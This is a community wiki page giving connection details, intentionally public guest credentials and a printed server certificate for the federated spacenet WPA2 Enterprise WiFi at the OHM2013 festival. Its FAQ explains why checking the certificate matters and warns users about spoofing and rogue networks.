OHM2013

From SpaceFED
Jump to: navigation, search

spacenet @ OHM2013

Spacenet is also being offered at OHM2013! You can connect with your credentials from your home hackerspace (or community). If you don't have an account you can connect with these credentials:

Username: guest@ohm2013.org
Password: guest

Phase 1: EAP-TTLS or PEAP
Phase 2: MSCHAPv2 or PAP
CN = *.ohm2013.org
CA = StartCom
SHA1 Fingerprint = BA:31:76:3C:D9:94:F7:D3:1B:E1:35:5C:E4:E1:72:34:74:02:59:C5


Join us at #spacefed on irc.smurfnet.ch if you have any questions. Enjoy! :)

P.S. Your link layer should be secure using spacenet if you do certificate checking, but please note that spacenet in and of itself does not protect against ethernet/layer 2 attacks. Watch out for DHCP spoofing, ARP/NDP spoofing of the gateway and rogue router advertisements!

FAQ

Why is this useful?

Spacenet is federated authentication for WiFi networks. Spacenet is about providing easy and secure "guest" WiFi access for your fellow hackers. When you have an account at a hackerspace or community you can connect to spacenet. If you do not have an account you can connect to spacenet at OHM2013 with the guest credentials as noted above.

Spacenet is useful because:

  • Easy of use: configure once, use wherever available.
  • Security: uses WPA2 Enterprise, thus dynamic keys (unlike WPA2-PSK).

Is connecting to spacenet at OHM2013 with guest-credentials more secure then connecting to the unencrypted (open) OHM2013 network?

Yes. Spacenet at OHM2013 runs on the same WiFi infrastructure and backend as the OHM2013-networks. Instead of providing completly unencrypted WiFi access, your data goes encrypted over-the-air encrypted by WPA2 Enterprise (CCMP/AES). Eventhough a lot of clients are using the same credentials to login to the network this is no issue.

The credentials you provide are used for authorization and authentication, *not* for encryption. A temporary key is derived in the 802.1X authentication process, this is transferred in TLS. This temporary key is used to encrypt the WPA2 handshake, in this handshake the session-key is determined.

In WPA2-PreSharedKey networks the temporary key is entered by the users and thus is open to attacks because the users know the key.

Why is checking the certificate important?

If your client does not check the certificate you cannot be sure you are actually connecting to the "correct" network. When your client is onboarded to a rogue network you are vulnerable to:

  • Man-in-the-middle attacks (your are not connecting to the "trusted" network)
  • Password sniffing (not really critical for guest credentials): with PAP your password goes encrypted over the air and with MSCHAPv2 your password will be reversible within a reasonable amount of time.

Certificate

Please check the certificate!

Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number: 66839 (0x10517)
        Signature Algorithm: sha1WithRSAEncryption
        Issuer: C=IL, O=StartCom Ltd., OU=Secure Digital Certificate Signing, CN=StartCom Class 2 Primary Intermediate Server CA
        Validity
            Not Before: Oct  8 07:50:42 2012 GMT
            Not After : Oct  9 23:22:54 2014 GMT
        Subject: description=nU7rvkhG3Xy0kwk6, C=NL, ST=Utrecht, L=Muiden, O=Int. Festivals for Creative Application of Technology Foundation, CN=*.ohm2013.org/emailAddress=hostmaster@ohm2013.org
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
            RSA Public Key: (2048 bit)
                Modulus (2048 bit):
                    00:b6:55:a8:36:bb:77:2f:98:bd:bf:91:3e:75:07:
                    ea:5a:76:ca:25:fa:0f:a4:b3:53:59:04:73:a7:4c:
                    4b:c6:dc:45:3c:3b:35:23:ee:6a:f7:9a:ea:fe:b7:
                    be:67:29:3b:9b:53:1e:2d:ea:ee:dc:a2:58:db:ea:
                    20:f7:ab:73:66:0c:ad:fb:8f:2b:df:65:49:68:ed:
                    aa:a4:41:15:9e:6a:29:59:91:1b:25:cf:a6:bc:1b:
                    38:d7:8d:8b:18:12:87:62:b9:fd:47:21:22:c7:00:
                    17:d4:00:a0:65:77:9d:bd:6b:9e:78:2d:3e:9b:bc:
                    09:9f:4e:3c:8c:f8:4e:b3:64:96:18:70:3b:7a:ee:
                    02:55:8b:c5:bd:b5:a1:88:11:98:f6:71:28:01:12:
                    0c:ae:cd:00:05:3c:77:aa:e8:0e:a5:45:a8:6e:e7:
                    af:57:6e:ba:14:c6:07:b1:90:99:33:bd:d8:08:55:
                    dd:34:47:ce:c7:fc:1f:05:c3:e5:b6:20:49:95:04:
                    09:56:0c:6d:ac:4f:a5:98:5a:bc:c0:2c:7b:4b:5d:
                    31:97:b7:e7:91:12:28:92:e5:4e:54:9b:fe:7f:c6:
                    a6:3c:13:57:8f:1c:8b:4c:d2:f6:fb:56:24:d4:bf:
                    3e:8e:8e:45:dc:a3:fc:c7:22:df:ee:40:c5:52:79:
                    ec:4f
                Exponent: 65537 (0x10001)
        X509v3 extensions:
            X509v3 Basic Constraints: 
                CA:FALSE
            X509v3 Key Usage: 
                Digital Signature, Key Encipherment, Key Agreement
            X509v3 Extended Key Usage: 
                TLS Web Client Authentication, TLS Web Server Authentication
            X509v3 Subject Key Identifier: 
                18:A9:E4:DC:CD:FF:3C:DA:BE:0B:94:ED:1B:7C:C8:7D:3C:76:AF:FC
            X509v3 Authority Key Identifier: 
                keyid:11:DB:23:45:FD:54:CC:6A:71:6F:84:8A:03:D7:BE:F7:01:2F:26:86

            X509v3 Subject Alternative Name: 
                DNS:*.ohm2013.org, DNS:ifcat.org, DNS:*.ifcat.org, DNS:ohm2013.org
            X509v3 Certificate Policies: 
                Policy: 1.3.6.1.4.1.23223.1.2.2
                  CPS: http://www.startssl.com/policy.pdf
                  CPS: http://www.startssl.com/intermediate.pdf
                  User Notice:
                    Organization: StartCom Certification Authority
                    Number: 1
                    Explicit Text: This certificate was issued according to the Class 2 Validation requirements of the StartCom CA policy, reliance only for the intended purpose in compliance of the relying party obligations.
                  User Notice:
                    Organization: StartCom Certification Authority
                    Number: 2
                    Explicit Text: Liability and warranties are limited! See section "Legal and Limitations" of the StartCom CA policy.

            X509v3 CRL Distribution Points: 
                URI:http://crl.startssl.com/crt2-crl.crl

            Authority Information Access: 
                OCSP - URI:http://ocsp.startssl.com/sub/class2/server/ca
                CA Issuers - URI:http://aia.startssl.com/certs/sub.class2.server.ca.crt

            X509v3 Issuer Alternative Name: 
                URI:http://www.startssl.com/
    Signature Algorithm: sha1WithRSAEncryption
        7a:5d:01:5a:a7:6d:46:6b:d7:2a:5f:b5:0b:18:d9:56:da:c8:
        4d:c4:86:72:62:b6:1c:1a:c0:f2:9a:2b:a1:a7:d1:22:5f:68:
        6c:c5:b9:f6:57:9c:4c:86:37:1b:e9:47:c1:03:37:98:d3:7d:
        d2:da:be:9f:d6:1a:f2:5c:08:06:a7:2a:c2:eb:7b:58:1e:88:
        94:57:a1:4c:f4:7e:5d:fc:38:82:49:53:10:42:60:e7:12:7e:
        25:13:de:1b:4c:74:d9:9d:00:d6:f6:74:eb:4b:a4:81:d0:41:
        52:07:d6:64:e2:04:16:3a:97:93:70:6b:6d:9d:31:63:34:92:
        d1:b4:0c:4b:af:76:44:3e:08:95:08:14:e9:16:06:9e:8a:2a:
        1f:e4:22:01:dd:44:7c:53:7f:64:61:a2:e7:44:f8:76:b3:ec:
        20:1b:02:7e:5a:72:5e:49:1e:82:9b:60:12:b3:9d:c8:52:93:
        1a:30:4b:54:c0:07:9d:ea:41:89:30:d8:0f:99:2e:90:ac:95:
        26:b9:26:bc:cc:41:9e:e5:d1:23:1d:45:06:60:bc:fa:d2:05:
        28:7f:68:ee:14:b1:36:2b:5d:32:57:96:a6:b8:ff:31:5a:a9:
        f7:99:79:74:b0:f2:30:c7:9d:2b:f6:e8:89:55:24:98:8b:0f:
        c0:bb:72:e5
SHA1 Fingerprint=BA:31:76:3C:D9:94:F7:D3:1B:E1:35:5C:E4:E1:72:34:74:02:59:C5